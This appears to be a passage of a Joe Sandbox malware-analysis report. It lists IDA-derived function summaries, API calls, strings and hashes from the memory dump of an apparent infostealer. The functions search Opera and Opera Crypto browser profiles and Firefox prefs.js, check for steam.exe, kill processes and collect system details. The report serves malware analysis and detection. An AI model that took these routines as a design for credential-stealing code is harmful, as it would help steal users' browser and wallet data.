Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: qb$qb$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-3194525032
Opcode ID: f2cb13ec2215150e147c155a19cda033966b1b30fdf2a973a4f262be7e28dafd
Instruction ID: add931eae7dbe6b79189b4d9761098577c51969a969ae99b2c41be8df4278687
Opcode Fuzzy Hash: f2cb13ec2215150e147c155a19cda033966b1b30fdf2a973a4f262be7e28dafd
Instruction Fuzzy Hash: BC512CB1900668AFDF709F64DC85ADDBBBAFF05301F0041A9FA48A6211EB315E89CF55

Function 00627178 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 006271A5
FindFirstFileA.KERNEL32(?,?), ref: 006271BC
StrCmpCA.SHLWAPI(?,00647AC0), ref: 006271DD
StrCmpCA.SHLWAPI(?,00647AC4), ref: 006271F7
lstrcatA.KERNEL32(?), ref: 00627248
lstrcatA.KERNEL32(?), ref: 0062725B
lstrcatA.KERNEL32(?,?), ref: 0062726F
lstrcatA.KERNEL32(?,?), ref: 00627282
lstrcatA.KERNEL32(?,00647AC8), ref: 00627294
lstrcatA.KERNEL32(?,?), ref: 006272A8

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00619148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0061F752,?,?,?), ref: 00619163
Part of subcall function 00619148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0061F752,?,?,?), ref: 0061917A
Part of subcall function 00619148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0061F752,?,?,?), ref: 00619191
Part of subcall function 00619148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0061F752,?,?,?), ref: 006191A8
Part of subcall function 00619148: CloseHandle.KERNEL32(?,?,?,?,?,0061F752,?,?,?), ref: 006191D0

Part of subcall function 00628BE6: CreateThread.KERNEL32(00000000,00000000,00628B15,?,00000000,00000000), ref: 00628C85
Part of subcall function 00628BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00628C8D

FindNextFileA.KERNEL32(?,?), ref: 0062735E
FindClose.KERNEL32(?), ref: 00627372

Strings

%s\%s, xrefs: 00627199

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 487a5dda27a6ad4044634c44510582d0b046bc15609a1d6ceb06d652b65b88a6
Instruction ID: 5596225138b3271bf85aede79d07e2a69e3020c2e39c7e53c6211fb937c4d4db
Opcode Fuzzy Hash: 487a5dda27a6ad4044634c44510582d0b046bc15609a1d6ceb06d652b65b88a6
Instruction Fuzzy Hash: 3A512DB194022C9BCF60DB64DC89ACDB7BDBB09311F0044E5AB09E3250EB35AB85CF65

Function 0061CE96 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

FindFirstFileA.KERNEL32(?,?,\*.*,006478EE,0061DC21,?,?), ref: 0061CF0E
StrCmpCA.SHLWAPI(?,00648638), ref: 0061CF2E
StrCmpCA.SHLWAPI(?,0064863C), ref: 0061CF48
StrCmpCA.SHLWAPI(?,Opera,0064790D,00647907,00647906,00647903,006478F3,006478F2,006478EF), ref: 0061CFD4
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0061CFE2
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0061CFF0

Strings

Opera, xrefs: 0061CFCC
Opera GX, xrefs: 0061CFDA
\*.*, xrefs: 0061CEBC
Opera Crypto, xrefs: 0061CFE8

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: 088b254ecf36eb15f62e8fb0509b60e9f3b48639b3221bafe66ee258cf14ab70
Instruction ID: e11b6a34406256389fa9484959707611406b167baf272ac092c3351b2fe4f4b2
Opcode Fuzzy Hash: 088b254ecf36eb15f62e8fb0509b60e9f3b48639b3221bafe66ee258cf14ab70
Instruction Fuzzy Hash: 0F02F832A0152AABCFA0FB25ED56ACD7376AF04310F4505A5BA08B7121DB316FD58F85

Function 0061E5B9 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

FindFirstFileA.KERNEL32(?,?,00648738,0064796F,?,?,?), ref: 0061E63A
StrCmpCA.SHLWAPI(?,0064873C), ref: 0061E65B
StrCmpCA.SHLWAPI(?,00648740), ref: 0061E675
StrCmpCA.SHLWAPI(?,prefs.js,00648744,?,0064797D), ref: 0061E701

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

CopyFileA.KERNEL32(?,?,00000001), ref: 0061E7DB
DeleteFileA.KERNEL32(?), ref: 0061E8A6
FindNextFileA.KERNELBASE(?,?), ref: 0061E949
FindClose.KERNEL32(?), ref: 0061E95D

Strings

prefs.js, xrefs: 0061E6F5

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: 3c5361ca9a0c0dd1304e909ed2c1f60cf285dd2fdf704d350810525e4138781d
Instruction ID: aca96444f8693af9e259bf643fc989018164788afd92d40cfc3255206d919626
Opcode Fuzzy Hash: 3c5361ca9a0c0dd1304e909ed2c1f60cf285dd2fdf704d350810525e4138781d
Instruction Fuzzy Hash: F8A14832900529ABCBA0FB25EC46BCD7376AF05310F4505A5AE08B7251DB32AFD9CF85

Function 0061C528 Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

FindFirstFileA.KERNEL32(?,?,006485EC,006478BB,?,?,?), ref: 0061C5A0
StrCmpCA.SHLWAPI(?,006485F0), ref: 0061C5C1
StrCmpCA.SHLWAPI(?,006485F4), ref: 0061C5DB
StrCmpCA.SHLWAPI(?,006485F8,?,006478BF), ref: 0061C668
StrCmpCA.SHLWAPI(?), ref: 0061C6C9

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 0061BB2E: CopyFileA.KERNEL32(?,?,00000001), ref: 0061BBD3

FindNextFileA.KERNELBASE(?,?), ref: 0061C834
FindClose.KERNEL32(?), ref: 0061C848

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: f7c7ba283a8291e8f90ed458fd2bd8c7dd8ab9aabb339ac4795169fea057070c
Instruction ID: 83e5a0e85a81dac0f95df789f3d5d552b4d6c2d82022937d600fd0c2c1cf0085
Opcode Fuzzy Hash: f7c7ba283a8291e8f90ed458fd2bd8c7dd8ab9aabb339ac4795169fea057070c
Instruction Fuzzy Hash: 9A81653194052AABCBA0FB34EC4AADC777AAF08311F4505A5FD08A7151DB349F99CEC5

Function 006242EE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 006242F8
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0062431A
Process32First.KERNEL32(00000000,00000128), ref: 0062432A
Process32Next.KERNEL32(00000000,00000128), ref: 0062433C
StrCmpCA.SHLWAPI(?,steam.exe), ref: 0062434E
CloseHandle.KERNEL32(00000000), ref: 00624367

Strings

steam.exe, xrefs: 006242FD, 00624346

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 9b3322f4ba16e608881c9b504566eee2cc7fb413db2e8012f2361a971be408a4
Instruction ID: b326b04fcd1d17ba2713488e4cdc21483688c2e63e89fd34d2edc5deb5522d56
Opcode Fuzzy Hash: 9b3322f4ba16e608881c9b504566eee2cc7fb413db2e8012f2361a971be408a4
Instruction Fuzzy Hash: 1F014F719016299FEB60DF649C09BEEBAB9BF06741F000195E509E6290DF349F41CF50

Function 00624452 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 0062447E
Process32First.KERNEL32(00000000,00000128), ref: 0062448E
StrCmpCA.SHLWAPI(?,?), ref: 006244A7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 006244BA
TerminateProcess.KERNEL32(00000000,00000000), ref: 006244C9
CloseHandle.KERNEL32(00000000), ref: 006244D0
Process32Next.KERNEL32(00000000,00000128), ref: 006244DE
CloseHandle.KERNEL32(00000000), ref: 006244E9

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 17bdc48aea9456628a2ea5c81a319b4000ae6dad9e7724674018079680a6b8bd
Instruction ID: 417edbeaf42352808753a1fb121dcfc81703cc44dd9105e1dd2fa6f5904c1f21
Opcode Fuzzy Hash: 17bdc48aea9456628a2ea5c81a319b4000ae6dad9e7724674018079680a6b8bd
Instruction Fuzzy Hash: 13117331A01728ABDB21AF64EC48BEF7BB9FB06752F004095F505E2190DF78AA41CF51

Function 00622A37 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

GetKeyboardLayoutList.USER32(00000000,00000000,00647812,?,?), ref: 00622A68
LocalAlloc.KERNEL32(00000040,00000000), ref: 00622A76
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00622A84
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00622AB3

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

LocalFree.KERNEL32(00000000), ref: 00622B5B

Strings

/ , xrefs: 00622ACF

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 09e895d4e68212ad8754e1e95b6537810afad14eac72193205112428622430c1
Instruction ID: 9d52b8b6660853d65aadd0de5166c35899b375974da54991aa496ee19160a690
Opcode Fuzzy Hash: 09e895d4e68212ad8754e1e95b6537810afad14eac72193205112428622430c1
Instruction Fuzzy Hash: EA315CB1D00239ABDB60AF64EC99BDDB3B9BB04301F1041E9B619A7122CB746F84CF54

Function 00622805 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00622877,006227B4,?,?,?,00625BD2,Windows: ,006478E0), ref: 00622819
HeapAlloc.KERNEL32(00000000,?,?,?,00622877,006227B4,?,?,?,00625BD2,Windows: ,006478E0), ref: 00622820
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,006478C8,?,?,?,00622877,006227B4,?,?,?,00625BD2,Windows: ,006478E0), ref: 0062283E
RegQueryValueExA.KERNEL32(006478C8,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00622877,006227B4,?,?,?,00625BD2,Windows: ), ref: 00622859
RegCloseKey.ADVAPI32(006478C8,?,?,?,00622877,006227B4,?,?,?,00625BD2,Windows: ,006478E0), ref: 00622862

Strings

CurrentBuildNumber, xrefs: 00622851

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: b397ce4cef03444d12aba6c7967defbcfb879bbba7464834099232bbc318c4b8
Instruction ID: 46c6581500d17a68f54660c3ea2157ee33a5bf0bc30eddb5bc31b675de3baf9e
Opcode Fuzzy Hash: b397ce4cef03444d12aba6c7967defbcfb879bbba7464834099232bbc318c4b8
Instruction Fuzzy Hash: 24F03075680704BFEB109BA0EC0EFAF7A7DFB45B42F100068F601A5191DBB45A51DB54

Function 006233B3 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 006233BA
CoCreateInstance.OLE32(00644220,00000000,00000001,0064C180,?,00000018,0062355D,?), ref: 006233DD
SysAllocString.OLEAUT32(?), ref: 006233EA
_wtoi64.MSVCRT ref: 0062341D
SysFreeString.OLEAUT32(?), ref: 00623436
SysFreeString.OLEAUT32(00000000), ref: 0062343D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
